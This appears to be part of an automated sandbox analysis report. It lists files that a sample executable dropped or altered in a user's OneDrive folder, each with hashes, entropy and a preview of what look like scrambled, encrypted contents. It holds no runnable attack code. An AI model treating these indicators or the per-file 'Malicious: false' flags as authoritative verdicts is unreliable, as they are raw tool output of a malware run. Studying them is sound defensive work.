SHA1:	3FA15B40B7B7118B948E92B2684C21F0140363CE
SHA-256:	61EE0024FFD87EC7D186ADE7E61B7FC27F11E8620A6A597A556BBF1FA54BB60B
SHA-512:	37CAB61511A1D7A292EAD6FC0EEA6C71E2DFE9BC40031662640BF742F5F975410A3D9B2547148781888C8CBA02BC637D7FAFEBA7B74DAA0868B47A5E0A302912
Malicious:	false
Preview:	.PNG.g.i..0.I.ps.f..U?.m=p{Y.&..W...0U........S..?.>...M.y.M..:.B...H.j.j.._./."S.,u....sY7..~..sH2..1$....\>.{..r......%...!."P..v...5./......3I....}.l..ZX.P.../...W?.o........apA.....e.1a..~.l_..]3..w.V.nD"..:1a..dY..D..*1..\...wLOTy..~.....Q....E.zl....I ...f...ou.g.].......-.8Z.G.&"8..6.[..x;....m<z...@.m.,.\|O......4.[).C....T]..78M.f......B.....L.....\..`..........-G\|z..H.O.1>.0.......}...............z.Z....W.u.....l,\|.....&.8cRy...>n..-........b"7Md"..3.1b$...alS...;......7.R...k..E....i..v...6.9.B.a...<?....\4..4;......r;.t=.;..R.i^wE..?......@2Z... ..i[`..7uv/..\..]N...F..;..m.........yn.I.qR..#%.!....:}(..5..-.......7.q...,..vD..%`?. ..s>....x%b.?... ....!.....g............Z....J.fX2an.z.IR..E:.`%t....z...!.. .2.Z.y..4v...:.....R.. V.G..V.;~.......n...]m.^.....?......Q.3U\xB.ik+.k..Kxxe....KD...$.zC.RN..V...7..U.@.v.._.-........HB[t.u.9F...@i....;..!...yT..YI1.I...?.jS.L..@....n.........f....[K....p.......!...U?...`>...s...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2110
Entropy (8bit):	7.902150081576442
Encrypted:	false
SSDEEP:	48:Sf6o3lDT31tUwc5aAkMJeYbjq+Z8QLKF8jYkB/PgQP9Kl4FCbQD:46cv3Uwc50MJeKjZZrLg8jd/PH0l+h
MD5:	746BC3D5ABFB7CA86A479BC994526B24
SHA1:	7DB19DFD2F1F29424CF7480A273FE02BABE4089E
SHA-256:	666C9172F603CD1F3D9421B749F3922985E7624062E7B8F3041DBF21C79EABF7
SHA-512:	ABA06452D62A616F5220F060F8BD4B7066E585189891AC4F62038014DAFDB2504B4B306F4A74A768838AB8CFFB2F1FA037FA40DF5679052793B11EC29C163C58
Malicious:	false
Preview:	.PNG..'@x...._.P.....:..tV..`......Y...J9 ..!0.:......ZK.w.X...E.Nf.o..f}HV...q.gK.fu..A^.......n4.....n.\......s\|f....C;.[..I.F...L..%&..n].iJ..HM.....8FD'...z1wb.D...............{...<...Fon..(...s...........................A(\.d.X.....Aa.%.i...Q_.....?Vs.x..U8.a..=R%......Ms..~]...`x...q.j.LQ-..9...p9T.c...:......8...5V.y.;FS...A<..iG......-.....!.Uy@U..g.:.._..G..OV..).u!g..E..{5....`1`{U..jd.S ..d..\.RL.5....Y...C..r..s...Q8...3.Z.O....T<...}=.dH......lr. ..r.U.8...B..}.3.o5J....`..l.+...$.`+w..h.C~..S.....0g.....]......R.J%..v...r.m>.?.+..M.1..5}.f.z/..=o>.?.Z;........@."..q...E.KD.jYrZ.....L~....i.. S.[....N..B.Ib..+."...<.........<._j..7.}9z..}........Z.\.Wn...2P..=l....,.J...x..,.c0.. .I....8..%.q..%.NBu..v.g.o.T.Y.)~.K.A.[.*....?..T..Z&-..8...x.i..u'a....lu..\..u....\|....(\|..).)1.L.>..^...a...[.[`M...Xb@. .....+..n5`+.......y...@.[X\.....Q...9..Y9@..j.Y.SiH.Et.4.v[..IB.).....:.R.........H."s....o....M_kI

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.scale-100.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	747
Entropy (8bit):	7.702810159565493
Encrypted:	false
SSDEEP:	12:o2YsBq4EtPTucmk5Hk9mkBzonivpi8vqQrkBAf8mRbxACGDkAs8IuUAZtcii9a:o2RQdTuk5H+mConMTCpBfObaDCPobD
MD5:	E8108B90AF034D5E7A2D5CBC11EC79DA
SHA1:	BB2ECC548679EFA54718646F3EBB1C6819AC5F47
SHA-256:	61FCAAD1F1FBE077C59DBF06A7B26B205684FB8823A38C43FEB2B2A71EACF6A9
SHA-512:	F879F050BA118363ABC41AAD640EAEBE2C7C56AC86CFDEFED16455D3B91755C0E8593D971F9826709E2A8C0E883C937DB4590B43412A975F6F1CF95AD983EDF4
Malicious:	false
Preview:	.PNG...W>.S.:...3......(i....;A....}%\.9!V...&7..a...@....}`&.O.M...5S\....>......2....f...@.&..O...0...;]....\|.^X.5..<%j...u..X...P..gQ<..q.....K_A.NPr..!x.:........g..,.3.yG..p~.g\..23{./.P.v.Q.-!.q..D.......~j...P/......Vg.S..7.......L.6qv.}..k.a.@.........j,........@....I..r.\|v....Q.Ha....8.zr......Y....~0..0.h-a.. ^{.....+....{..\|..g.Cx5.......v(s;.....v..g....A.......)....!a.R...w.<WxQ...E_.......+.... ....9odH^. b..so...J(5..9<.'s.C..N.,tL..j..Gt`.\..G.2/.`5.;..YP..,.{....l....>..Zm...T....(.~.m...to...n.%...A$....w.y.....3K.......b......l...~.+K2F.uu&.1........en/.j8t......./....X.1...G....+.H....$ .l.Vl.W)q.PL.?..Bo...Zk(P../K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.scale-125.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	859
Entropy (8bit):	7.73594204700802
Encrypted:	false
SSDEEP:	12:wYSCDlZkaHgqiAKVRX3YAcPrcRHpsqyJWWcTc0zrVu2BYAsRrBzhDuYWp6Yp5/oj:d/lZVGRTRuJWWYwvdrnqpxPubD
MD5:	23480363D5DC0C6A86ACA5961915E5D9
SHA1:	A1F6682D6A48C691B580A9377155D0962949EA99
SHA-256:	2DA96FD3BE97C2CE2BF4776539961E2AB2F6EE92678F3CFF4858C5452B9C1F0B
SHA-512:	4791647727A686724948F37D0711A9181CA06DF2CE3F83AA3CD13A857591241C29FE120CBDE09A2069C3C6D94B6B3F51A068999A58D6A7D12C14CEB5109F96C6
Malicious:	false
Preview:	.PNG......H...b.a..........p..].f( ..yI...x\a...2q..nR........&.}m...l.O..U!.f;K..G{.'..v..a.....v..4,...)$^v.;F~..../.1....`B.R..:...jK.k.v..6'...f.j......\|.-.J.VK....~Ges.....#.O....p..U...t.\|.cm^f.j.g.}y....D.\%.8Y..V.d.78O...Hy....W.#.dW....+....5../....f~.Q........hC..~uz.Kk....j..A~#1.r.....#.siB...n...}.....=....P,..=..=:V.<).?.+.g.....(.z...y.!..F.o....t..Y.._<si..wZ...g&D.-.N...:.U............Nl...^.6.&\|...Z....B...h.:.......V...Q.>..W..d.....X.7.T@R...p.]?<1i.....@iAa}..f.w..B..h..0K.r...Q.q...X.....T..Zh..s.c...Z...1.3.:.-..3.\..8t.x.8.[.}.....'C2.`R..#5S/..>@F....+........L..X....).4.T.5.......z..=._Z.\.o.......;.v;..{.2.......Q.}Q.6## ......=X...H.*.f.@U8..7..4....z.u.@..Z...]........E5.+!T.j2..F......;.R.k..YD.........(.%K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.scale-150.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	925
Entropy (8bit):	7.7989850789942
Encrypted:	false
SSDEEP:	24:sSBOOEzgyrI46sZ3dVSq8B4zRJejT4NCMIHAQQqZrTbD:s2qM8dVS7Si4PIHAQvZLD
MD5:	78C0D737676A7B3BAAB7668BA7418E53
SHA1:	9695BB55C3A12BD20CFB19F4F34FE8DAA902751D
SHA-256:	D9EF43C8A090101708DA7EC932C5E38CD843BCEAC8FB96ED8A6BDA7EE9878000
SHA-512:	4C67B277351D9B7CD9F0DE7FBF6D264C033CE7F2C164F8820FC498B89BB031C91AF375123C9338164EB7F306E48AD8A708E2E4CE14B3B69C6C9C38BBDDFD05F1
Malicious:	false
Preview:	.PNG.^_.....'...?.4..m.]...$-_.u...L.]z..E..2............:..'q'..c..Y..H.../..D.R..u.sn..0..'.jN.....J......".......%...Q.i......].Hn.v.+. <.....!.F^_q..u.......g.......8...7>U...A3X.k..ec...1u....].J....9..+....9.Q..2.iHV'.d&...(un.X+.......\|...^..#T=..ey.._..L..%r.n......J[... .+..(....:h%.{....C..8K.?......}h.P......^W.)>.0.7R.I.^1.,.\|+..b........4.;..Gs.\|W.(..I.:.N....E@h.f.=)bG..B..u/.T..E]".T.HuxS!..5..T\.xHS.k..q;../..\|\.h.>.}.3}).3'.}.... ..;.c.%e\|..~.>wX...ei.f@vY..M...hMi.....c.F.H.aM....g!..s>...].r3..(. .....2r.._>.....)z......F...;.Zy......U.5mueQ.`m.t.p...).PWS.U..{...)..L..u..8C&..~m!M..S..N.2!NM..r#d.......,.....0..c.F........t.2d...F..3.}$J.A.~.+......X....Z.....~.....Id....h.2%....H.A....ZK.{..mJ.\|.p.0.~........w.o..q...6.Ta.].W. .v..*...V.&.{/...`.m......u3.VSVb. .K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.scale-200.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1137
Entropy (8bit):	7.8321358637697145
Encrypted:	false
SSDEEP:	24:zZlg305f9zSSoR9wUCQISzJcxE3RmPmSYp6m25bUfa9bD:zZlz5FzuwJQhax2Zzg9D
MD5:	BF2E8FCAE4B535C1CEC492214B1F13F4
SHA1:	60BE5D1BCAD21DD5F6D5CC9720448722CC8CD815
SHA-256:	D212F081B6F17F9AB65E00033F68986C58426E3A1706176CCF64D9E6364F13F5
SHA-512:	153D94C8C703A2F16437A38F1F0CCE22EE1ACF0A010415CEBC6E03D4802A5BE8FC4AB7961576DA60895AF862A7F5B43626E7D961B3F68DF5D2252F66C46287B3
Malicious:	false
Preview:	.PNG......h....H~...Udy...i..rjw./.D....M.._.C..^J...$..v.L...E.6....P..,v.-.XQi....^a..k..........9.f.&,.......e.M).._.u\.x.....w....[..q...}i.GC'.$..{2.%CL..7..S....../.(. ;.gq/8.{v.<.B.ZF.... ..."....-..j....Pe:....;.\t...J.Rj5.>&..T.B......%..<Q.......x..E..1.M...{...^.....Co.........+..vEL....?.\T/.&8N9.J...F..9...!.../..(h.G....+.. .]...J+..z+..i.i.....=.....3f.Y..{...\|D3.Mp...S AO.[.].J..O..p.N..^e.<....v.)..........2xd....CS.d.W.B..Y/(K...e...q(.3O-O...DA.....H...G..8v...,.<8...+.j.....[.."H.8...e...6....+2..z....K=........W&....7G.9.hy.L...B&A.0K..dh%.i5....m...$p.cJ}...Xi..L.....}_.C..YT]n......0.0..Je9].U..R...:.T..t.c..@S...}e6..S...$...l.q+.\|.5y..i.x..Os.Wn..L..m..m.kU.T...xD..[. .....;.A>...........3/......^J.1....XV...3\?..qR4..G.:...a.b.Z@.. ^l.b..U.6..d..N..x.....5...<^..\...,.7...WF9z..Heb..6.......;..L....)G.....K..BW..p5(p7.f.\|.'.T.;=.....z....K..c.s\|. .(.<F..7.{.I.).:....Z...Nq..F-.J%ZH.:.l`..).-?....;.p.B_E.n)...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.scale-400.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2054
Entropy (8bit):	7.907298425441619
Encrypted:	false
SSDEEP:	48:/YwQbF1GaDAHfw7yG6ahPvjqkbAQ78hZeTY4ORrp8GE2soD:tQRbMHfwb/wBQ0ATpypV
MD5:	6D276410088F7F6181C41DD6AAB671A5
SHA1:	1FB77288626142CC070CBF0916D11F7C1C2F1600
SHA-256:	F532B5E5D69BCD6EB0F32BB534DC0761D2152B89C73B30C05471E35E11C02CBF
SHA-512:	A50B748970E0C0A548C4252EB6CDAA8CECF3C281D51D896FEB39ED18E558E77ED1C9827E4E72FD692DEB30BA48477626B7D5D5B381D42D579E159844AD698CD6
Malicious:	false
Preview:	.PNG......u.i..zo..Eg../.R.4.6..aE..xb.....n.Ej..",J....M...Ef.v...a....:..).&L..c6.......J0.M......w...=dAQ..X?%.....M.sU.TX.D)?.....J'Gy..........2.."P!.&.T..h.^{.U....8...6,......[l..W$.....^j...P.[..2._.K..vo.I...d...S.\|...)T7.x..C...Z<~...K....si}q..~{.\|.k.`n.p..].k51.0M^.+&...kmG.....[K....u ..k(P...U-..J..>.X.@......n..xJ...>BD.$..........0..N.P)./.F.@....~...l..6(<.I...w..9.v.6..........(B.[.V.aZ.KF.m..Q..T..t.....k...T...7?..3..w...................Mm:.)-...&;8..pP....\OL9n9....H..b.4...[....R...K.... Z.N\.Zz...{......../.'-I....4.D.NT...^A...\|....G...#..d`.A....X./...oc.M.lO.Y...Y.....\.RY...e...<.0..!..Ga)9..Z...:Q.E.0}Sv@....b...qR.m..i.k.....U.7..&^%.r.a.G.0..?..w4.l....Z........<...........(C.y...=rn7j0)..g.f.&_..e2..n...E]w6".\|\|...%Y .2.K%x..9.....^..RE...a...!k>G?`.....[{..`./.jMP.A......}..f..R......<.2.:....J*...!'.<.`......!t.cp...?m.. .j._...0..<.U/.U].. f...'<.QH.T6....8.{N......J.Z.F..N.J.i.....5B...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDrive.VisualElementsManifest.xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	678
Entropy (8bit):	7.6539685045020915
Encrypted:	false
SSDEEP:	12:it3rOc6keqUg2z2QtLk6WpcLvCCda9lBIx3u0R2ZzgA6XUvrntaLYtcii9a:SrSkeY2zJC65vCeOlCQuhXUZa6bD
MD5:	38DD3EE868DD3376294A97357D6EA7C0
SHA1:	476C592324EBA820C59B3E22102D99B237676965
SHA-256:	0119A827F7A6C850DC973A6ABFCC4D0AAFE7B6A83215EF5055F53763FFBC2712
SHA-512:	9C34F958583AA00B1BA0232E69DF284CCD51C9C5C465AF9E7E4E456A9AC2E4BE233105E60DFF5BC503581CBECC676E166F5EE2C96E75E11AE273795A80AF3CD0
Malicious:	false
Preview:	<?xml..g....\|<....].{zo......#wJ.PVn.d.j...,...j....Ev....J&..Y...+~..B..>.....t....hJ...L5Z\...(..M...;'....y..V.ZR.B...G`......,....P%.....!..ch.?U...R.Q..c...8>zr...J.mp....x..>z.f...2.......[...RO.<Ep.`t@..fgsHA.......?.......d.gd.9...!..E..f..\...+d.sB...wvQ..&g.....&cW.Ub)khK..=V^.z....w.Y..%..`_.9...xU(...[.K.p7......N..V#..uH.....4D......K0....5..X.`=-.x..3A...G.\...ze..r.Q.......Ok7G.r._0F.Z........,..d#...]".F.\|..4.T..l.Q...s:F.z......vN......$..w.....ZV2....,....$....qL.....!.i..1.rM..N0.~O....Q9....E&...q....$!..........}.m.:y..c>p.7{...\|aw.?o...eK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	1586822
Entropy (8bit):	4.596503395828359
Encrypted:	false
SSDEEP:	12288:FgOVLbjrll9THaYAIRhZ0obpXMaAZQoEKwIFrE8pfU:FgA3jx3rZ0oyxnEjIhEU8
MD5:	679A164756356BF1CE597346CCCC96B7
SHA1:	F705E214B2E66362A58B2344841645DEE41D21BE
SHA-256:	3407867A977B6CA9A6C1B4A0F7B60E36C6F63F4240C0BD3081E99913178AC0BC
SHA-512:	C2CFC8735264A4FF8193B18D8DCB8937ADFB7DFAC1DEF5BF5ADCF22BF507FA5DFA4670060504DBDBBB399A5527337769053D047A4E5C4127B2C7D3758BD7ABC2
Malicious:	false
Preview:	MZ...g(:3.E.A$..........Z`..S.w.X.?....(\|.d.~...._....m..3..v.."...d.X\|.!.,...SI.~S..Q.M.....@.#&&......k..'.c..H...>...q}....yI&v.%..................n.7../&..k.&]..Z..."%.5a.4_....SS.]...aM..p.e.1:.N..@.T..U....yB'C...\.V.....$....._..VV O.Y,[..R.j..G...$...tZ..........i....?..Y.L1f^.&.]...3...$..D.2....r..<..]..../1.9._i...FEqOZ.0...Fd...".h`.m89.w.+.\)..3..<..~Lx..0.h.p...45>7....&.....{.y....#.)\|.f'.=...._.f..a.;..Y#.1...+..1..!}...y.........!K.Q.0;....6..Q ..-.(J.a...?.t......0......_0....Y.0"....@..m.(-..).4........y.$../J.OE...k..v.~.A......4.p6.)_......hJ......A?.s.......;.>...LT.."..x...@....2m9.\3F.N..>4\].B#.'.{.c.R\]O..'&P...'bU.i....JRZ....N.3..."J.....f`.ab..ro...s...y...8. .......s....d.W@.S^\..........e!.....`..}/g.M.....{..b$...^.s.N.z...H..j&.........`~=-vO..A....S....$.Ez..a.K...Y..gC...B.......`#.s..'.....`.V.....".98n..p..*...k..E.m<.....e.,...b1^^.".^...X.h..4..~.ZY...X.l.$.&..`W}..1'K.!V....u..{...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveLogo.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5859
Entropy (8bit):	7.970514378724054
Encrypted:	false
SSDEEP:	96:Vsz+fbALbgmh4YniK6UicR5OCAPDHp1LBVfRmvFFEisA4riQrVVkfbDGTSar3LY:Vsz+fbcboTe5NAPDHppBV5rA47wf3GT4
MD5:	F69B24EE7075C94B407323AE12C9D1F6
SHA1:	7B2BA838F336BFC90DAD16735CF187F80A3576B3
SHA-256:	8350D453A6799A607E3AFA379B9277FC0937A9F64DCBFF5FD4E618F37A9C78E2
SHA-512:	B8932EA3F338B89ED0037BE626A8DCB7BBAC8B46B3E2A79910B2C6CC58E282221487FE2EED0EC3AC4EB6F57E47ED39AD75031365ED1BC7A11254BEDBEAA142F6
Malicious:	false
Reputation:	unknown
Preview:	.PNG....8...n...E...`.T\|...ft.##..M.~....Q..._.....Bo..N.4.A..5....l........ps..&...G.y.#...!.....1.iA..._&..i.....xh.E..>.z...D.M.J.....1..y....... >.r.HK.&Ku..N..r....Lej.l;zV..GD.`b..Re..E......~.n\..87.K.=..+..:...+...?>.E.S...ka...k.....[Uc..[L.....j..>.....p..H....:..0.R(..(.}G.q@9a..q1^j`..._c...[.W......._.].t.......>>c....-;..._.I.h..'...W.j.m.y.S..<h"IV...J.$.....#&.'.>E0E%t.Z ./?.v....%.&..:5Y.^>....zZ./.E....@.e4..............d^"k.DJ..k,2.!$...`d.7..6EB.H._r......7$....,_19z...b8..=..#+..&b...v.P.S.G>...6.....$..tI..Rj4......_t.f.iM.R._q..`...o6....ns...,.X"...C..5.\|[.\'0.....H.+Hu......q.l`.2.....R.(d.\...\.pV..H'.-.Q.g6...........'.m.s.Q...N..Q.3......!]r...gR5(.:.7.. .@..y..yTJ7@..B.2-zR.A.5;....0.W%....g`...........S....`J<..0.....6.X..}..R.._W....u..9>..vl.VXA.,.zJ.^....v.'....L.{p..x....*l.....I...[.t.X...............9E_......kzHdm....."...QnN?..J.k.\........L..7$u...3.x.1.O.%B..&Y\+!.mv.f#..v...7.l...Tu....T.1&.x..A..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	33147014
Entropy (8bit):	7.93712145977963
Encrypted:	false
SSDEEP:	786432:QSyGYVG6gFyUWzAM2f+4n6RDjLXES+YSFIl37zmJaggZ:Q+XAUWt10QjLU8SFIlryJm
MD5:	5E0F454FF9E847276DEDD42A4560EED3
SHA1:	9CA1A91646BFC34A787BE7D7143BED2EB862762E
SHA-256:	CF77F2C7FDF8C962581629574FDF58273713ED440E7E7118C32E8E0839DB610D
SHA-512:	8A7AC721B9FC036D8EB0DE23D4C222C3120CD2597779E1940B58954EB937B82C630AF21285EA1826FF9A9B7B591AFEFFBEEF1A3689ADAF4F5A3AC186A6796A13
Malicious:	false
Reputation:	unknown
Preview:	MZ.....IYP7.qqD.9...\.W(.i`/ .y...l..F...?.]^.n'.e...3. .Z.....9..!.`.K~.dC...{.^...G...t...!AD..8.....3y.bx..0,4...sa.C3..j...j..5....&w0Q..}9.....y9.<./(...i.-z`...........;.yR.p.N..6.^..a.CU.m.:.@`.u1.W.x!...._=.[.R`.LQ......s...{...3..}..+."......_Z=..XB...[........+.pv.i...)..i.)4...n.....?......Kus?...g.y...............J...IE....JQ.O.:UI.(5...}j......Uw\<.4....4,YG...t..hg...(....AL4$6...M....rzMKD...!..EZ .w.;1...D.+K.\|..K..9H..@}..)..X./F.....J. ...Rs.3I.....[..~MI.....C..g&.Z...[c........J...)V.;....A.HK...x...%gl...a>)..:..1j...r..f.i....g.6....m2V.n..;I...<..%..N... .w.f.........I...iIz.Y..,......G..,...[P....].:R4......N......P?...^..^.6.IA..i...(.8....">{..C..._(d.....n...v.?%M.j....=W.(..a.a.....mHDy....9.v#V..9.$.).AEx:..{"=r.C...4...>3;.?!.su$0.c.5.9..?..wLd.r.......f..d.....g@.\|..3..O...#.L.$.....9..l....i.O...a..v....i..&.._..bb....Cy.YI....b.}{..5...g25..}....Oh..-.T..-....i...s...#.d....Z..F.G4..;w..UD.3.Z...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2544558
Entropy (8bit):	6.805243069446418
Encrypted:	false
SSDEEP:	49152:HLBMIFOLkC9SkGVcuFHkry4momPf5yD/boFFYCyosGMD1wDb5SToIjjKEQY5XW:HltOLkCgTVcDry4mbeC/R
MD5:	9FF45E2EDD05CCC6FA1A9570E30A3F87
SHA1:	2F6B9F41FB1EE98FB7E0127DE2620ABF042DC487
SHA-256:	FE62AF2C8E680D35CFC8CB63352B85B25F2185D43FEC106F61DC272CA7A9EE51
SHA-512:	3E444E4F034595D964C1BABD99AE0840EE984A7F93ED9F6D76CA2EFDB19C64FDBBB9B655820F7FEDAC47F4408CCBF018B741708559452104762B15936FD0140F
Malicious:	false
Reputation:	unknown
Preview:	MZ......li...v...b......8.AB....I.V.....:.E.j...S...fU}.....t...._.....(u.K..Zb^W..Y5.....6N....;....W.iJb.@...^...[tc....`....UV<.45y;..b...B...P!.n..<....VN7..[.1B...W.+....b8...^...H.=\|...Yk..&...+K8."F...z.nC.l..4.P.=hO.Hl.k.w.@.\|x.&BP...J.+.....t....N#@.pm.H.5...(E..0.69..M..C...[$.?1....y...7D.&......B_..T..qv.Bc..\|ei)M..4..w_..vw.hkbb0T?x.F...%O./!^..h.....Q.2.b.~.H2.....^^.)...HZ...\ .........n......R)....h^7...].t.o...J,..+?...3....c@.=.F..[s.Z.........{t-...#~a...88.s.....>..]a.D...b.zj(..G^.c..Fp.................<R.dzz.S..B9..W.}.d.;A\|.....@......@...k<.....0...N.t.T..A.U...e5.)^.m..7.pB...Y...D=..Ow1....h..M.Q..1..[.j.+....~.6qi.......B..m.oJ0.y".....dJ.X.....h..l..DX...Vvj.g...Jr...:MD.e3.....=Dc.<#...S..ug/....\.....jYk.....$..O.T .....Q....u...,.X)C.@?.!k...._.z..~1a.Q.H......S+.ZL8.PS.{...W.=.gi.xQ..T..B.%....}...1.y.%.(.",.SA'md.C..}..Wu.0.&....a....jU...1.-.p....I-...g....f.....D,...b;.....\|..s._.........n./Lo...s.....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2391686
Entropy (8bit):	6.847723781160483
Encrypted:	false
SSDEEP:	49152:EFrloWkZazjAqD8YMptDqEkhjBQh/ydRDpoeezMG9eaPMo6+y7D1zWO4VTIIk+P0:6HAqD8NDjkBmeezMG9vPMx+38
MD5:	04F986379A63B9EFE054F271A975CBD5
SHA1:	8AF06CB66F9639C76BD2D3132131C1B12FEC13E9
SHA-256:	86A919DA9FD807AFC685A375205DD81B1D7D792CE9218770B0944631D80121E0
SHA-512:	633ABFBA80DF5BFB1B990F319CF9280FAA20518793AC59CB2E773FE394BD4A05C08EF925D108123312699C4A8DB9DEAFF1CE7ABA98E39B9BEE16FA863D1A47DF
Malicious:	false
Reputation:	unknown
Preview:	MZ....."..X.kh.F...IBL..+.uw.M..U.'...;.o.L.7.D.2.#IB....d...&-F....<.H.. [.r...&....O$..?.;.W...;.H..,#k./p..?o..."..'.S.8...sq.t.~.W!!....<....x..jb.XY.Y.6.`N.-.ygIy0...??F.F.5HI H..S/.{.m}..<a.Mm}.1..v.T).........2../0..>....wOdq.a.%QP0.U....R8.^.ju.Uq.F....Y.....M...G.h;.b.)..a..X....D..-".(:k...>W{.......![....zqH.w.9..9+..}.h7h4...K...y@.....8.?-d.........v..-....E)q.(M.\.]\W.Na".X.j.R.Z.b....C.?....%a.....og.G..... .....4.L l.....J.....cD....)9..3.l..MNN..,oU...x:.D....W)BQ.....l{..p.3.h4..]..%.l....C.#.E...};5.y.MZh.%.f.....h.R%...\......_......c.....v.... ...1\|BKF/..`..h.c.-...X.4@...\|DW.....Ker....x...9.L/....E}m....................z...W.,.fm....bMb(^...!...O..S...F....P...A8T)...w&.u..)....j-..2.,.X..O....c.t&.F^D..9").Y.. .\..,...........R..\.....h"f..K....rt.....W.#@G.D.%...s..g..I.,..8./_...<S4../......B.. .w{..V^R.b....KP@.I+...b...".eE.r...K..l.ow...l.(5m^.c...jI\|\..R./R~..@.sb...98.v...ATbI+.F.w.7~WV....b.q.@......:0.O

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\QuotaCritical.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5012
Entropy (8bit):	7.964957585881485
Encrypted:	false
SSDEEP:	96:IyURsdT4uYintd4HFM8Tbr5O9En7SMrxAR0hgfWUaW+kv042ba:y4tnKFbH5r0AgeqKO
MD5:	A2E464757FF445BFAB819403949AFBBC
SHA1:	E018B17E2018ECAA89B2D1A3CDB96612641FC577
SHA-256:	B3D446BDD9AA4073687B742A482E85C7C1F1F5388979F50DEDB25E2C5B7BE6F3
SHA-512:	520681D52054DCE2FD1100F79667FEAA718205B576DBD4F3229D96E64287BF66BEA237746491DA155EB4D191BF55F0C63F217FF1603CA03DD256CFAFD08FDE6E
Malicious:	false
Reputation:	unknown
Preview:	.PNG..@,v..).7g.Ig%u..I".nK....`..CP..G).#LB..5V....X...O.=^xG}?..Q.d.]sD.?\|....St.!E$.^..S.9.....=s... X....,.E>.&.ha0.\..2..,.i..7..x.O.X^.c......}.{.O...%....-..lob.Sk.^...5".y.n....a.....].?..(...~g.Xd.z7....:.N~Ho....f....gf............XS0.t..,."...Z#...#...2..4.....d.. ..-._....2\|Q.O........V..d.-.3.d+i?..,..j.Hd...P.U$e......qU4...,~p1._`4............K....sJe.j....._,cZ..N.D..z.........#...T.BQJ.....&......}>jp.(..;.W.V...M..M...6$...0.....K....s...$...n....d.jl,k..'Z.=.O.......I..!..vw.2..-......L..K..\|.M&Id@..U..}..iU4K=l.o.\|6.]...;..f...D.4...F....n........X..W."..B.F.C..k...@o..H.j..E:pQ..&G...u..I...a.%...,W.._..K...N.&t...EF.)!......iY.ls.Z....k.i..$bo.....}.U"j"2../..V..I.g.+L.J...9O.+y./B.+K..8+.o.%......%...O..j...0.`2..gN..l....\...1....N.kw......?44H..*.v..rlC./.b...M.+.p.j.n..?....&...{.iuV..X.6C......t...Ck.XIG.>s..=.[iz.,...u..9..XN.?..z.{...S0.9B..[=..`..(.o.^.Z..H=.A._....7......h.}...P......3H..z...@J...K.4p.8.Ir.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\QuotaError.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5102
Entropy (8bit):	7.972607956825478
Encrypted:	false
SSDEEP:	96:ELcKYvnBCK3I/GQEebWljCxG+/yPsdqv4++r0Ni8h64jMpDOTn:ELcPn/Y/VmjCuC6NHpMhOTn
MD5:	660797566324797B0224D9E628E35050
SHA1:	47BC0984253589609542ECAC30550942EF7C8F17
SHA-256:	A1DC6B52903B92427C1E9D33B861AB940F5AFB271A7A5DF619878012C764059C
SHA-512:	F619BC9016C384B06BF5E623A47A0FF160F96879DE361B1D746571C03B9F504E1020B1D904D6FA5E506EC1003E0C4A20689A9FF576EC0598BE55F9F1C133337A
Malicious:	false
